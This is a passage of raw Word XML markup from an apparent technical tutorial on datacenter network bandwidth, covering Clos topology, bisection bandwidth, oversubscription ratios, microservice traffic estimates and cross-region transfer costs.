              <w:t>CXL 2.0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4FE16A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>64 GB/s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875E4D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Memory expansion, disaggregated memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17E5363A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="153942C9">
          <v:rect id="_x0000_i4372" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5E0924" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Bandwidth in Distributed Systems — The Network as Bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65917B26" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 Datacenter Network Topology and Bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192E4F2D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Modern datacenter network (Clos/Fat-Tree topology):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A03A2E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE4BF77" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">                    [Core Switches]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B922062" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">                   /    |    |    \         (each link: 400 Gbps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF11582" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">            [Spine Switches Layer]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED3081F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">           / | \ / | \ / | \ / | \          (each link: 100–400 Gbps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EB7CAE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">     [Leaf (ToR) Switches]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451AFCDF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">      /||\  /||\  /||\  /||\               (each link: 10–100 Gbps to servers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3763D2CD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">   Servers Servers Servers Servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9AC982" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth at each tier:</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912"/>
        <w:gridCol w:w="3406"/>
        <w:gridCol w:w="1494"/>
      </w:tblGrid>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="1AB3326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313B32" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Path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B8C522" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Typical Bandwidth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6F6645" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="490D837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A1118C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Server ↔ Top-of-Rack (ToR) switch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2B254B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>10–100 Gbps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426444" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>&lt; 1 μs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="07E72C1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79EC6A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>ToR ↔ Spine (same pod)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6F531C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>100–400 Gbps (aggregated)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D42046" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>5–10 μs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="45720C2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936890" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Spine ↔ Core (cross-pod)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1F3FF8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>400 Gbps per link, many links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E5D6E7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>10–50 μs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="30C0564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49CCED" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Cross-datacenter (same metro)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476AE1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>100–400 Gbps (dark fiber)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DBF7DB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>0.5–2 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="0F86B8F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BB3008" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Cross-region (e.g., US-East ↔ EU)</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2E8E9D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>1–10 Tbps (aggregate)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220E2E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>50–150 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E73267D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The key design principle — Bisection Bandwidth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629850D1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Bisection bandwidth = the total bandwidth available when the network is divided into two equal halves, and all servers in one half communicate with servers in the other half.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08613FBD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Non-blocking fabric:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> A Clos network is designed so that ANY server can communicate with ANY other server at full line rate (10 Gbps per server) simultaneously. There are no bottlenecks in the core.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D6F906" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Oversubscription:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> In some designs, higher layers have LESS aggregate bandwidth than lower layers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731C19F8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181D212D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>40 servers × 10 Gbps = 400 Gbps at the access layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308E8C59" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>ToR uplinks = 200 Gbps to spine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AAF35E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Oversubscription ratio = 400:200 = 2:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24475077" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>This means if ALL 40 servers try to communicate outside the rack simultaneously at full speed, they can only achieve 50% of their line rate. This is acceptable when most traffic is rack-local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE6AD9C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Bandwidth Between Services — The Practical Limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529F2558" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How much bandwidth does a microservice actually consume?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E687B7C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Consider a service handling 10,000 requests per second:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495607B5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Average request size: 2 KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0472856C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Average response size: 10 KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38752B78" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Inbound bandwidth: 10,000 × 2 KB = 20 MB/s = 160 Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02116D05" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Outbound bandwidth: 10,000 × 10 KB = 100 MB/s = 800 Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719004CC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Total: ~1 Gbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D14F7DA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For most microservices, bandwidth is NOT the bottleneck.</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> CPU (processing) or latency (waiting for dependencies) is typically the constraint. But certain workloads ARE bandwidth-bound:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68754CC5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Video/media processing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Transcoding a 4K video stream requires reading ~25 Mbps input and writing multiple output streams (100+ Mbps total).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770F14F4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data pipelines:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Moving 10 TB of data between services for batch processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A3CA5B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Search indexing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Distributing index segments (gigabytes) to search replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E96C652" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ML model serving:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Loading multi-GB model weights into memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594319A5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database replication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Streaming WAL at high write volume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3BB152" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Cross-Region Bandwidth — The Expensive Resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530E8396" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why cross-region bandwidth is the most constrained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDAE170" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Physical infrastructure (undersea cables, long-haul fiber) is expensive to build and maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E077E9F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Total capacity is finite and shared among all tenants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60917A31" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Cloud providers charge significantly for cross-region data transfer:</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00"/>
        <w:gridCol w:w="2716"/>
        <w:gridCol w:w="2428"/>
        <w:gridCol w:w="2906"/>
      </w:tblGrid>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="24BC126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09A13C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Provider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7B692B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Intra-region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7E5F73" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cross-region (same continent)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20ADE5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cross-region (intercontinental)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="0B2495D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1B5FD2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>AWS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37EA08" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>$0.01/GB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1A2095" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>$0.02/GB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60A848" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>$0.02–0.09/GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="0CB317C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944D98" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>GCP</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716B73" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Free (same zone), $0.01/GB (cross-zone)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341390" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>$0.02/GB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DF4DA9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>$0.05–0.12/GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4DA3D66E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>At scale, cross-region bandwidth costs dominate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21660916" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>A service replicating 1 TB/day cross-region:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627763A3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19364B78" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>1,000 GB × $0.02 = $20/day = $600/month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F9F99C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>A data-heavy service replicating 100 TB/day:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE9A64B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509D762B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>100,000 GB × $0.02 = $2,000/day = $60,000/month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CB312E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This economic pressure drives architectural decisions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652A7837" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
